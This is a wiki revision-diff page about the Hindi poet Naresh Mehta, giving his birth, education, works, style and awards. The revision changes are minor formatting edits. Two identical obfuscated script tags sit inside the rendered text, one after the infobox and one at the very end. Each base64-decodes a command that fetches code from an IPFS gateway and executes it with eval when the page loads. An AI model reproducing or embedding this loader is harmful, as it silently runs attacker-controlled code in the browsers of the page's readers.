Difference between revisions of "नरेश मेहता"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "अविभावक" to "अभिभावक")
Line 12: Line 12:
 
|पति/पत्नी=
 
|पति/पत्नी=
 
|संतान=
 
|संतान=
|कर्म भूमि=
+
|कर्म भूमि=[[भारत]]
 
|कर्म-क्षेत्र=
 
|कर्म-क्षेत्र=
|मुख्य रचनाएँ=अरण्या, उत्तर कथा, चैत्या, दो एकान्त, प्रवाद पर्व, बोलने दो चीड़ को आदि
+
|मुख्य रचनाएँ='अरण्या', 'उत्तर कथा', 'चैत्या', 'दो एकान्त', 'प्रवाद पर्व', 'बोलने दो चीड़ को' आदि।
 
|विषय=
 
|विषय=
 
|भाषा=[[हिंदी]]
 
|भाषा=[[हिंदी]]
 
|विद्यालय=[[बनारस हिन्दू विश्वविद्यालय]]  
 
|विद्यालय=[[बनारस हिन्दू विश्वविद्यालय]]  
 
|शिक्षा=एम.ए.
 
|शिक्षा=एम.ए.
|पुरस्कार-उपाधि=[[ज्ञानपीठ पुरस्कार]] (1992), [[साहित्य अकादमी पुरस्कार हिन्दी|साहित्य अकादमी पुरस्कार]] (1988)
+
|पुरस्कार-उपाधि=[[ज्ञानपीठ पुरस्कार]] ([[1992]]), [[साहित्य अकादमी पुरस्कार हिन्दी|साहित्य अकादमी पुरस्कार]] ([[1988]])
 
|प्रसिद्धि=
 
|प्रसिद्धि=
 
|विशेष योगदान=
 
|विशेष योगदान=
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''नरेश मेहता''' ([[अंग्रेज़ी]]:''Naresh Mehta'', जन्म:[[15 फ़रवरी]] [[1922]]) [[ज्ञानपीठ पुरस्कार]] से सम्मानित [[हिन्दी]] के यशस्वी कवि एवं उन शीर्षस्थ लेखकों में से हैं जो भारतीयता की अपनी गहरी दृष्टि के लिए जाने जाते हैं। नरेश मेहता ने आधुनिक [[कविता]] को नयी व्यंजना के साथ नया आयाम दिया। नरेश मेहता ने [[इन्दौर]] से प्रकाशित 'चौथा संसार' हिन्दी दैनिक का सम्पादन भी किया।  
+
'''नरेश मेहता''' ([[अंग्रेज़ी]]: ''Naresh Mehta'', जन्म: [[15 फ़रवरी]], [[1922]]) [[ज्ञानपीठ पुरस्कार]] से सम्मानित [[हिन्दी]] के यशस्वी [[कवि]] एवं उन शीर्षस्थ लेखकों में से हैं, जो भारतीयता की अपनी गहरी दृष्टि के लिए जाने जाते हैं। नरेश मेहता ने आधुनिक [[कविता]] को नयी व्यंजना के साथ नया आयाम दिया। नरेश मेहता ने [[इन्दौर]] से प्रकाशित 'चौथा संसार' हिन्दी दैनिक का सम्पादन भी किया।
 
==जीवन परिचय==
 
==जीवन परिचय==
नरेश मेहता का जन्म सन् [[15 फ़रवरी]] [[1922]] ई. में [[मध्य प्रदेश]] के [[मालवा]] क्षेत्र के [[शाजापुर]] कस्बे में हुआ। [[बनारस हिन्दू विश्वविद्यालय]] से आपने एम.ए. किया। आपने आल इण्डिया रेडियो इलाहाबाद में कार्यक्रम अधिकारी के रूप में कार्य किया। नरेश मेहता दूसरा [[सप्तक]] के प्रमुख कवि के रूप में प्रसिद्ध हैं। सन् 2000 ई. में इनका निधन हो गया।
+
नरेश मेहता का जन्म सन् [[15 फ़रवरी]], [[1922]] ई. में [[मध्य प्रदेश]] के [[मालवा]] क्षेत्र के [[शाजापुर]] कस्बे में हुआ। [[बनारस हिन्दू विश्वविद्यालय]] से आपने एम.ए. किया। आपने आल इण्डिया रेडियो इलाहाबाद में कार्यक्रम अधिकारी के रूप में कार्य किया। नरेश मेहता दूसरा [[सप्तक]] के प्रमुख कवि के रूप में प्रसिद्ध हैं। सन् [[2000]] ई. में इनका निधन हो गया।
 
==कृतियाँ==
 
==कृतियाँ==
 
* अरण्या  
 
* अरण्या  
Line 52: Line 52:
 
नरेश मेहता की भाषा संस्कृतनिष्ठ [[खड़ीबोली]] है। शिल्प और अभिव्यंजना के स्तर पर उसमें ताजगी और नयापन है। उन्होंने सीधे, सरल बिम्बों का प्रयोग भी किया है। नरेश मेहता की भाषा विषयानुकूल, भावपूर्ण तथा प्रवाहमयी है। उनके काव्य में [[रूपक अलंकार|रूपक]], मानवीकरण, [[उपमा अलंकार|उपमा]], [[उत्प्रेक्षा अलंकार|उत्प्रेक्षा]], [[अनुप्रास अलंकार|अनुप्रास]] आदि [[अलंकार|अलंकारों]] का प्रयोग हुआ है। नवीन उपमानों के साथ-साथ परंपरागत और नवीन [[छंद|छंदों]] का प्रयोग किया है। रागात्मकता, संवेदना और उदात्तता उनकी सर्जना के मूल तत्त्व है, जो उन्हें प्रकृति और समूची सृष्टि के प्रति पर्युत्सुक बनाते हैं। आर्य परम्परा और साहित्य को नरेश मेहता के काव्य में नयी दृष्टि मिली। साथ ही, प्रचलित साहित्यिक रुझानों से एक तरह की दूरी ने उनकी काव्य-शैली और संरचना को विशिष्टता दी।
 
नरेश मेहता की भाषा संस्कृतनिष्ठ [[खड़ीबोली]] है। शिल्प और अभिव्यंजना के स्तर पर उसमें ताजगी और नयापन है। उन्होंने सीधे, सरल बिम्बों का प्रयोग भी किया है। नरेश मेहता की भाषा विषयानुकूल, भावपूर्ण तथा प्रवाहमयी है। उनके काव्य में [[रूपक अलंकार|रूपक]], मानवीकरण, [[उपमा अलंकार|उपमा]], [[उत्प्रेक्षा अलंकार|उत्प्रेक्षा]], [[अनुप्रास अलंकार|अनुप्रास]] आदि [[अलंकार|अलंकारों]] का प्रयोग हुआ है। नवीन उपमानों के साथ-साथ परंपरागत और नवीन [[छंद|छंदों]] का प्रयोग किया है। रागात्मकता, संवेदना और उदात्तता उनकी सर्जना के मूल तत्त्व है, जो उन्हें प्रकृति और समूची सृष्टि के प्रति पर्युत्सुक बनाते हैं। आर्य परम्परा और साहित्य को नरेश मेहता के काव्य में नयी दृष्टि मिली। साथ ही, प्रचलित साहित्यिक रुझानों से एक तरह की दूरी ने उनकी काव्य-शैली और संरचना को विशिष्टता दी।
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
* [[ज्ञानपीठ पुरस्कार]] (1992)
+
* [[ज्ञानपीठ पुरस्कार]] ([[1992]])
* [[साहित्य अकादमी पुरस्कार]] (1988)
+
* [[साहित्य अकादमी पुरस्कार]] ([[1988]])
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{ज्ञानपीठ पुरस्कार}}{{भारत के कवि}}
 
{{ज्ञानपीठ पुरस्कार}}{{भारत के कवि}}
 
[[Category:ज्ञानपीठ पुरस्कार]][[Category:साहित्य अकादमी पुरस्कार]][[Category:चरित कोश]]
 
[[Category:ज्ञानपीठ पुरस्कार]][[Category:साहित्य अकादमी पुरस्कार]][[Category:चरित कोश]]
 
[[Category:कवि]][[Category:आधुनिक कवि]][[Category:लेखक]][[Category:साहित्य कोश]]
 
[[Category:कवि]][[Category:आधुनिक कवि]][[Category:लेखक]][[Category:साहित्य कोश]]
 
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Revision as of 05:22, 15 February 2018

naresh mehata
poora nam naresh mehata
janm 15 faravari 1922
janm bhoomi shajapur, madhy pradesh
karm bhoomi bharat
mukhy rachanaean 'aranya', 'uttar katha', 'chaitya', 'do ekant', 'pravad parv', 'bolane do chi d ko' adi.
bhasha hiandi
vidyalay banaras hindoo vishvavidyalay
shiksha em.e.
puraskar-upadhi jnanapith puraskar (1992), sahity akadami puraskar (1988)
nagarikata bharatiy
any janakari inhoanne indaur se prakashit 'chautha sansar' hindi dainik ka sampadan bhi kiya.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

naresh mehata (aangrezi: Naresh Mehta, janm: 15 faravari, 1922) jnanapith puraskar se sammanit hindi ke yashasvi kavi evan un shirshasth lekhakoan mean se haian, jo bharatiyata ki apani gahari drishti ke lie jane jate haian. naresh mehata ne adhunik kavita ko nayi vyanjana ke sath naya ayam diya. naresh mehata ne indaur se prakashit 'chautha sansar' hindi dainik ka sampadan bhi kiya.

jivan parichay

naresh mehata ka janm sanh 15 faravari, 1922 ee. mean madhy pradesh ke malava kshetr ke shajapur kasbe mean hua. banaras hindoo vishvavidyalay se apane em.e. kiya. apane al indiya rediyo ilahabad mean karyakram adhikari ke roop mean kary kiya. naresh mehata doosara saptak ke pramukh kavi ke roop mean prasiddh haian. sanh 2000 ee. mean inaka nidhan ho gaya.

kritiyaan

  • aranya
  • uttar katha
  • ek samarpit mahila
  • kitana akela akash
  • chaitya
  • do ekant
  • dhoomaketuah ek shruti
  • purush
  • prati shruti
  • pravad parv
  • bolane do chi d ko
  • yah path bandhu tha
  • ham aniketan

sahityik parichay

naresh mehata ki bhasha sanskritanishth kh diboli hai. shilp aur abhivyanjana ke star par usamean tajagi aur nayapan hai. unhoanne sidhe, saral bimboan ka prayog bhi kiya hai. naresh mehata ki bhasha vishayanukool, bhavapoorn tatha pravahamayi hai. unake kavy mean roopak, manavikaran, upama, utpreksha, anupras adi alankaroan ka prayog hua hai. navin upamanoan ke sath-sath paranparagat aur navin chhandoan ka prayog kiya hai. ragatmakata, sanvedana aur udattata unaki sarjana ke mool tattv hai, jo unhean prakriti aur samoochi srishti ke prati paryutsuk banate haian. ary parampara aur sahity ko naresh mehata ke kavy mean nayi drishti mili. sath hi, prachalit sahityik rujhanoan se ek tarah ki doori ne unaki kavy-shaili aur sanrachana ko vishishtata di.

samman aur puraskar


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>